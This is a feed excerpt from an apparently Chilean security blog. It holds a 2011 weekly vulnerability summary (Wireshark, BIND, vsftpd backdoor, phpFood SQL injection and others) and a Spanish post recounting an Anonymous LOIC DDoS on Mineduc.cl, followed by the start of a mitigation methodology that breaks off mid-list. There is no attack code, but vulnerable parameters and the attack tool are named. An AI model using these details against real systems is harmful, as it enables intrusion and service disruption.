Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="https://mail.zope.org/pipermail/zope-announce/2011-June/002260.html"&gt;&lt;span lang="EN-US"&gt;https://mail.zope.org/pipermail/zope-announce/2011-June/002260.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.11 CVE: Not Available&lt;br /&gt;
Platform: Hardware&lt;br /&gt;
Title: Ingate Firewall and SIParator SIP Module Remote Denial of Service Vulnerability&lt;br /&gt;
Description: Ingate Firewalls are hardware firewall devices that support Session Initiation Protocol (SIP) via SIParator SIP-based communication devices. Ingate Firewall and SIParator are exposed to a denial of service issue. The issue occurs when processing SIP requests that contain multiple Transport Layer Security destinations.&lt;br /&gt;
Ingate SIParator 4.9.1 and prior are affected&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.ingate.com/Relnote.php?ver=492"&gt;&lt;span lang="EN-US"&gt;http://www.ingate.com/Relnote.php?ver=492&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.12 CVE: CVE-2011-2597&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Wireshark Lucent/Ascend File Parser Denial of Service&lt;br /&gt;
Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic. The application is exposed to a denial of service issue because it fails to properly handle specially crafted packets. Specifically, the issue affects the Lucent/Ascend file parser when parsing specially crafted packets. Wireshark versions 1.2.0 through 1.2.17, versions 1.4.0 through 1.4.7 and version 1.6.0 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.wireshark.org/security/wnpa-sec-2011-09.html"&gt;&lt;span lang="EN-US"&gt;http://www.wireshark.org/security/wnpa-sec-2011-09.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.13 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: SAP Netweaver Insecure SAPTerm User Account Creation Security Bypass Vulnerability&lt;br /&gt;
Description: SAP NetWeaver is an integration platform for enterprise applications. The application is exposed to a security bypass issue that can allow a user to create SAPTerm user accounts with hardcoded credentials. SAP Basis versions 620 through 640, SAP Basis versions 700 through 702, 710 through 730 and 72L through 800 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48509/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48509/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.14 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: IBM DB2 "DT_RPATH" Insecure Library Loading Arbitrary Code Execution Vulnerability&lt;br /&gt;
Description: IBM DB2 is a database management application written for use on multiple platforms. The application is exposed to an issue because the "/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1" binary (installed with root privileges) includes the current working directory&lt;br /&gt;
(".") in the "DT_RPATH" (runtime library search path) of the ELF (Executable and Linking Format) header. IBM DB2 9.7 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48514/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48514/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.15 CVE: CVE-2011-1898&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Multiple Virtualization Applications Intel VT-d chipsets Local Privilege Escalation Vulnerability&lt;br /&gt;
Description: Multiple Virtualization applications using Intel VT-d chipsets are exposed to a privilege escalation issue that occurs when interrupt remapping is not enabled in the chipsets.&lt;br /&gt;
Specifically, this occurs because the affected chipsets fail to prevent a guest which owns a PCI device from using DMA. An attacker-controlled PCI device can exploit this to generate MSI interrupts by writing to the interrupt injection registers. Xen and KVM are vulnerable and other Virtualization applications may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48515/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48515/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.16 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: IBM InfoSphere Information Server Multiple Local Privilege Escalation Vulnerabilities&lt;br /&gt;
Description: The IBM InfoSphere Information Server is an enterprise platform for data integration. The application is exposed to multiple local privilege escalation issues. Specifically, these issues occur because insecure file permissions and ownership settings may be applied to "ds.rc" and "dsenv" files within the DSEngine directory.&lt;br /&gt;
IBM InfoSphere Information Server versions 8.5 and 8.5.0.1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="https://www-304.ibm.com/support/docview.wss?uid=swg21504279"&gt;&lt;span lang="EN-US"&gt;https://www-304.ibm.com/support/docview.wss?uid=swg21504279&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.17 CVE: CVE-2011-1223,CVE-2011-1222&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: IBM Tivoli Storage Manager Client Multiple Buffer Overflow&lt;br /&gt;
Description: IBM Tivoli Storage Manager is an application for running automated backup and recovery of data. The application is exposed to multiple buffer overflow issues. A buffer overflow issue affects the Journal Based Backup function. A buffer overflow issue affects the Alternate Data Streams processing function.&lt;br /&gt;
IBM Tivoli Storage Manager 6.2.0.0 through 6.2.1.3, 6.1.0.0 through 6.1.3.1, 5.5.0.0 through 5.5.2.10 and 5.4.0.0 through 5.4.3.3 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48519/discuss"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48519/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.18 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Vsftpd Compromised Source Packages Backdoor Vulnerability&lt;br /&gt;
Description: Vsftpd (Very Secure File Transfer Protocol daemon) is a secure FTP server for Linux, UNIX and similar operating systems.&lt;br /&gt;
The application is exposed to a backdoor issue because the "vsftpd-2.3.4.tar.gz" source package file contains a backdoor. &lt;br /&gt;
The Vsftpd 2.3.4 source package is affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48539/discuss"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48539/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.19 CVE: CVE-2011-2465&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: ISC BIND 9 RPZ Configurations Remote Denial of Service&lt;br /&gt;
Description: ISC BIND (Berkley Internet Name Domain) is an implementation of the Domain Name System protocols. The application is exposed to multiple remote denial of service issues.&lt;br /&gt;
These issues affect servers with recursion enabled and configured with the Response Policy Zones (RPZ) feature. Specifically, the issues are triggered when processing certain RPZ rule/action patterns, which contain specially crafted DNAME and CNAME records. ISC BIND versions prior to 9.8.0-P4 are vulnerable. (Note that 9.8.0-P3 is not affected but has been replaced by 9.8.0-P4).&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="https://www.isc.org/software/bind/advisories/cve-2011-2465"&gt;&lt;span lang="EN-US"&gt;https://www.isc.org/software/bind/advisories/cve-2011-2465&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.20 CVE:&lt;br /&gt;
CVE-2011-2633,CVE-2011-2632,CVE-2011-2631,CVE-2011-2630,CVE-2011-2629&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Opera Web Browser Multiple Remote Denial of Service Vulnerabilities&lt;br /&gt;
Description: Opera is a Web browser application. The application is exposed to multiple issues. A denial of service issue occurs when handling unknown content on certain web sites, as was demonstrated on "&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.falk.de/"&gt;&lt;span lang="EN-US"&gt;www.falk.de&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;". A denial of service issue occurs when a popup page of the "Easy Sticky Note" extension is reloaded. A denial of service issue occurs because of an infinite loop when processing the "column-count" Cascading Style Sheet property, as was demonstrated on an unspecified Wikipedia page. A denial of service issue occurs because the browser fails to properly deconstruct certain Silverlight instances, as was demonstrated on "vod.onet.pl". A denial of service issue occurs when processing a certain Certificate Revocation List file, as was demonstrated by the "multicert-ca-02.crl" file. Versions prior to Opera Web Browser 11.11 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/windows/1111/"&gt;&lt;span lang="EN-US"&gt;http://www.opera.com/docs/changelogs/windows/1111/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/unix/1111/"&gt;&lt;span lang="EN-US"&gt;http://www.opera.com/docs/changelogs/unix/1111/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/mac/1111/"&gt;&lt;span lang="EN-US"&gt;http://www.opera.com/docs/changelogs/mac/1111/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.21 CVE: Not Available&lt;br /&gt;
Platform: Web Application - Cross Site Scripting&lt;br /&gt;
Title: WebCalendar Multiple Cross-Site Scripting Vulnerabilities&lt;br /&gt;
Description: WebCalendar is a PHP-based application. The application is exposed to multiple cross-site scripting issues because it fails to properly sanitize user-supplied input to multiple scripts and parameters. WebCalendar 1.2.3 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48546/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48546/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.22 CVE: Not Available&lt;br /&gt;
Platform: Web Application - SQL Injection&lt;br /&gt;
Title: PhpFood "restaurant.php" SQL Injection Vulnerability&lt;br /&gt;
Description: phpFood is a content manager that tracks food orders.&lt;br /&gt;
PhpFood is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "id" parameter of the "restaurant.php" script before using it in an SQL query. phpFood 2.00 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48552"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48552&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.23 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: AeroMail Multiple Vulnerabilities&lt;br /&gt;
Description: Aeromail is an email application. The application is exposed to multiple remote issues. A cross-site scripting issue affects the "folder" URL variable. A cross-site request forgery affects the composition screen. A cross-site request forgery allows attackers to send spam email without a user knowing.&amp;nbsp; An HTML injection issue occurs because the application fails to sanitize folder names. An HTML injection issue occurs because the application fails to sanitize the email attachment names. An HTML injection issue occurs because the application fails to sanitize the subject line before displaying emails.&lt;br /&gt;
AeroMail version 2.80 is vulnerable, other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48510/discuss"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48510/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.24 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: IBM Rational DOORS Multiple Unspecified Vulnerabilities&lt;br /&gt;
Description: IBM Rational DOORS is a Web application that works with IBM Rational DOORS databases. The application is exposed to multiple unspecified issues. An unspecified cross-site scripting issue exists. An unspecified issue affects "Server Error"&lt;br /&gt;
responses. An unspecified issue affects the application.&lt;br /&gt;
IBM Rational DOORS versions 1.4 through 1.4.0.3 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="https://www-304.ibm.com/support/docview.wss?uid=swg27020404"&gt;&lt;span lang="EN-US"&gt;https://www-304.ibm.com/support/docview.wss?uid=swg27020404&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.25 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: WeBid Local File Include and SQL Injection Vulnerabilities&lt;br /&gt;
Description: WeBid is a web-based application implemented in PHP. The application is exposed to multiple input validation issues. A local file include issue affects the "lan" and "USERLANGUAGE" parameters of the "includes/messages.inc.php" script. 2) Multiple SQL-injection issues affect the application. WeBid 1.0.2 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.webidsupport.com/forums/showthread.php?3892"&gt;&lt;span lang="EN-US"&gt;http://www.webidsupport.com/forums/showthread.php?3892&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.26 CVE: Not Available&lt;br /&gt;
Platform: Hardware&lt;br /&gt;
Title: Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities&lt;br /&gt;
Description: The Portech MV-372 VoIP Gateway is a GSM/CDMA/UMTS mobile gateway device. The device is exposed to multiple issues. An information disclosure issue exists because the device displays information about the model type, module description, and firmware and codec versions without authentication. A denial of service issue occurs when passing an overly long string to the "password" field while connecting through a Telnet service. Multiple security bypass issues exist because the application allows the modification of configuration settings to occur without the provision of a valid username and password. All version of firmware are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48560"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48560&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br style="mso-special-character: line-break;" /&gt; &lt;br style="mso-special-character: line-break;" /&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-4134867217437980279?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/resumen-de-vulnerabilidades-semana-28.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-5408878293672624087</guid><pubDate>Fri, 08 Jul 2011 16:28:00 +0000</pubDate><atom:updated>2011-07-08T15:24:46.930-04:00</atom:updated><title>Anonymous Mineduc.cl TANGO DOWN !!!</title><description>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Calibri, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;Comentarios:&amp;nbsp;&lt;/b&gt;pramirezh[at]gmail_dot_com&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Calibri, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;Hola, después de varios días sin postear algo, trabajo trabajo trabajo, hoy estuve muy de cerca en el ataque organizado por Anonymous y la idea es poder describirles el modus operando de este DDoS realizado a MINEDUC, partiendo por la publicidad generada para la organización:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-eCKRQ0jwFS0/ThcvBUSTQiI/AAAAAAAAAJ4/43FEEd_Unkw/s1600/flyer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-eCKRQ0jwFS0/ThcvBUSTQiI/AAAAAAAAAJ4/43FEEd_Unkw/s320/flyer.jpg" width="317" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Después de esto estuve de forma activa en el canal IRC, los bot! No informaban nunca el target, todos los pedían y lo pedían, hasta que llegó la hora, &lt;b&gt;9:59 am GMT-4 y Colkra informaba del target:&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Z-gcIvQZNHQ/ThcvC9tWe2I/AAAAAAAAAKE/sqfcsc0bqCM/s1600/target.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="84" src="http://3.bp.blogspot.com/-Z-gcIvQZNHQ/ThcvC9tWe2I/AAAAAAAAAKE/sqfcsc0bqCM/s320/target.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Ahí comenzó el ataque con la herramienta &lt;a href="http://es.wikipedia.org/wiki/Low_Orbit_Ion_Cannon"&gt;LOIC&lt;/a&gt;, de la cual ya hablé en algún momento, después de eso, no pasaron más de 7 minutos cuando comenzó a caer el sitio:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-TLXsk69Trts/ThcvCgjhg9I/AAAAAAAAAKA/Awy_fib9xXk/s1600/nettool.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://4.bp.blogspot.com/-TLXsk69Trts/ThcvCgjhg9I/AAAAAAAAAKA/Awy_fib9xXk/s320/nettool.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Y no solamente el sitio de &lt;b&gt;&lt;a href="http://www.mineduc.cl/"&gt;Mineduc&lt;/a&gt;&lt;/b&gt;, si no que varios otros sitios alojados en el mismo server:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-EEtdQG-8oiM/ThcvAvm-CII/AAAAAAAAAJw/VMEPRJWTZfg/s1600/domain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-EEtdQG-8oiM/ThcvAvm-CII/AAAAAAAAAJw/VMEPRJWTZfg/s1600/domain.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Se notaba que los muchachos de seguridad (llamados *****) estaban tratando de hacer lo posible por mantener el sitio arriba, ya que el LOIC estaba comenzando a dar errores en algunos momentos:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://4.bp.blogspot.com/-aiqskIsbyfQ/ThcvB8xbofI/AAAAAAAAAJ8/rF0NLojnWmw/s1600/LOIC.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="210" src="http://4.bp.blogspot.com/-aiqskIsbyfQ/ThcvB8xbofI/AAAAAAAAAJ8/rF0NLojnWmw/s400/LOIC.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Pero no, el sitio estaba lentísimo:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/-RM99UHbW4bo/ThcvAG87_mI/AAAAAAAAAJs/whT_R6COPM4/s1600/chrome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="90" src="http://3.bp.blogspot.com/-RM99UHbW4bo/ThcvAG87_mI/AAAAAAAAAJs/whT_R6COPM4/s400/chrome.png" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Al fin del día, de igual forma colapsó, y quizás las medidas de mitigación fueron correctas, pero no realizaron un sizing adecuado para soportar el DDoS de los pingüinos… me reía mucho en el canal de IRC, ya que decían, “&lt;b&gt;Sigamos tirando piedrazos al servidor&lt;/b&gt;”…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Pero bueno… aparte de mostrar la noticia me gustaría contarles que ya están en práctica varias medidas de mitigación, tanto a nivel metodológico como a nivel técnico, y para ello partiré con la metodología (&lt;b&gt;Solo el big picture, no en detalle&lt;/b&gt;, &lt;b&gt;&lt;i&gt;ya que me puede hacer ganar dinero &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: Wingdings; font-size: 10pt;"&gt;J&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;span style="font-size: 10pt;"&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;1.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Preparación:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Establecer contactos,&amp;nbsp;definir los procedimientos,&amp;nbsp;y recopilar información para&amp;nbsp;ahorrar tiempo&amp;nbsp;durante un ataque.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;2.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Identificación:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Detectar&amp;nbsp;el incidente,&amp;nbsp;determinar su alcance,&amp;nbsp;e involucrar a&amp;nbsp;las partes apropiadas.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;3.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Contención:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Mitigar los efectos&amp;nbsp;del ataque&amp;nbsp;sobre el medio ambiente&amp;nbsp;de destino.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;4.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Remediación:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Llevar a cabo acciones&amp;nbsp;para detener la&amp;nbsp;denegación de servicio.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;5.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 